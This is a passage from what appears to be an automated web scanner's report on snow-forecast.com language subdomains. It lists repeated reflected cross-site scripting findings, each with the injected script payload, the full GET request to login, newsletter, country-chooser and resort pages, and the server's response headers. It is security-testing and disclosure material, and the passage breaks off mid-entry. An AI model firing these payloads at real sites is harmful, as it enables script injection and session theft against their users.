The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8ec"><script>alert(1)</script>7da74cc4f71 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3Ead8ec"><script>alert(1)</script>7da74cc4f71 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "14522afca3d59ba0db052dff9b0696ba" X-Runtime: 64 Content-Length: 19324 Set-Cookie: sfcsid=5d1cd480d0fef7bad53fe96c3b8a881f; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.46. http://it.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83be8"><script>alert(1)</script>ee6a63cf745 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?83be8"><script>alert(1)</script>ee6a63cf745=1 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "b5c5a86cbc6da2e4fe96d10ce382b562" X-Runtime: 219 Content-Length: 18273 Set-Cookie: sfcsid=b18a1e01746006a61b4a2ae1593e914d; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.47. http://it.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 268cf"><script>alert(1)</script>0f9467c11c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?268cf"><script>alert(1)</script>0f9467c11c3=1 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1f5f3384743ec3e6555dcc853f225773" X-Runtime: 74 Content-Length: 27786 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.48. http://it.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c291"><script>alert(1)</script>16cc291156f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?6c291"><script>alert(1)</script>16cc291156f=1 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "b962b690c58bdab96b14dd7866d46960" X-Runtime: 137 Content-Length: 42294 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:50 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.49. http://nl.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nl.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c65"><script>alert(1)</script>6927d3ff734 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?64c65"><script>alert(1)</script>6927d3ff734=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "f4f90e36741977a21cfb834f7c68e82c" X-Runtime: 467 Content-Length: 24151 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88573"><script>alert(1)</script>c4bc2c9668e was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'88573"><script>alert(1)</script>c4bc2c9668e HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d613cf2e2eabac45ee229faff92a1759" X-Runtime: 55 Content-Length: 18114 Set-Cookie: sfcsid=c2e85833b3bae34b63ba7c35bc190f06; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5510"><script>alert(1)</script>20ae1894665 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3Ea5510"><script>alert(1)</script>20ae1894665 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "50ccf403054a35366e6b371dc1ce2abc" X-Runtime: 84 Content-Length: 19179 Set-Cookie: sfcsid=4f51b0dbb25d3c425be45b9fa8780719; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.52. http://nl.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nl.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b5f"><script>alert(1)</script>79b751c11bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?c9b5f"><script>alert(1)</script>79b751c11bf=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "0423c8a162992e3c6941e8d8bc5e09d6" X-Runtime: 66 Content-Length: 18089 Set-Cookie: sfcsid=9b19fd8a97e3211b3a2394e6eae1d64b; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.53. http://nl.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nl.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64bd5"><script>alert(1)</script>9b9ef43a6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?64bd5"><script>alert(1)</script>9b9ef43a6dd=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "2b7175f6f062c66a5fe061833510ae8a" X-Runtime: 119 Content-Length: 27622 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.54. http://nl.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nl.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11427"><script>alert(1)</script>2ebdb6c1c4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?11427"><script>alert(1)</script>2ebdb6c1c4c=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "5033551d6749a1acf4db97d8f8e7786d" X-Runtime: 123 Content-Length: 42344 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:28 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.55. http://pt.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pt.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e0e"><script>alert(1)</script>d337a7dc4d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?64e0e"><script>alert(1)</script>d337a7dc4d8=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "53d9658c2ed7183672d22e4d22b9eeec" X-Runtime: 46 Content-Length: 24319 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac6d9"><script>alert(1)</script>6327b21d49f was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'ac6d9"><script>alert(1)</script>6327b21d49f HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "504eda5f1ce6ae18ebf0967b1af2b45f" X-Runtime: 55 Content-Length: 18179 Set-Cookie: sfcsid=da2f770113ec05042498b4fa798737fe; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a099"><script>alert(1)</script>9515d82a89a was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E3a099"><script>alert(1)</script>9515d82a89a HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d121265e6f957dd70e6f62b70d44873c" X-Runtime: 56 Content-Length: 19351 Set-Cookie: sfcsid=b1a13249d50ddc582b507cc1f69d8ab6; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.58. http://pt.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pt.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfde7"><script>alert(1)</script>96fb2414259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?bfde7"><script>alert(1)</script>96fb2414259=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "03ede3f654325c8411b37fec3e855b57" X-Runtime: 80 Content-Length: 18167 Set-Cookie: sfcsid=2ad7fcbdc68929437e4b5c08e3b6d174; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.59. http://pt.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pt.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40f4"><script>alert(1)</script>34f1e30ccfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?b40f4"><script>alert(1)</script>34f1e30ccfb=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "2ffc37843801c8085b20dbdb7ef764a1" X-Runtime: 71 Content-Length: 27720 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.60. http://pt.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pt.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df355"><script>alert(1)</script>a776ab20b93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?df355"><script>alert(1)</script>a776ab20b93=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "18b4616e7d688e4be117cbf59fc4f587" X-Runtime: 147 Content-Length: 42559 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:41 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.61. http://ru.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ru.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d52ad"><script>alert(1)</script>f35f2ae78c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?d52ad"><script>alert(1)</script>f35f2ae78c0=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "f779ebc45e3a1d78f79ffb9c7b0b199d" X-Runtime: 48 Content-Length: 25350 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fd1"><script>alert(1)</script>43f4d995b95 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'c0fd1"><script>alert(1)</script>43f4d995b95 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "102846ecc2066e4f3db1664cdf475aa5" X-Runtime: 51 Content-Length: 19080 Set-Cookie: sfcsid=3b1beb3bd3fd925c3207e9a2721a4182; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d86"><script>alert(1)</script>0565c054e4b was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E97d86"><script>alert(1)</script>0565c054e4b HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4682bf979d407eace79303e1e41eabde" X-Runtime: 440 Content-Length: 20207 Set-Cookie: sfcsid=d743baf820e2ad869df5cb8379557505; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.64. http://ru.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ru.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b45c6"><script>alert(1)</script>bd98c36dfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?b45c6"><script>alert(1)</script>bd98c36dfde=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "94ce25e1441b872ae3436f0f1a861057" X-Runtime: 59 Content-Length: 19128 Set-Cookie: sfcsid=7a6cb5307d1c5fbf7f0a70e92d2861d4; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.65. http://ru.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ru.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b12d"><script>alert(1)</script>90f2a24a7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?3b12d"><script>alert(1)</script>90f2a24a7a=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "06a0d3a16f7c71e8a7ab55ea142dad24" X-Runtime: 70 Content-Length: 28573 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.66. http://ru.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ru.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19386"><script>alert(1)</script>233fca9ff19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?19386"><script>alert(1)</script>233fca9ff19=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4920cc1c30aac9cfae7a6fd7dac1e0a5" X-Runtime: 141 Content-Length: 44205 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:45 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.67. http://se.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://se.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978c8"><script>alert(1)</script>369b8bb10a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?978c8"><script>alert(1)</script>369b8bb10a0=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
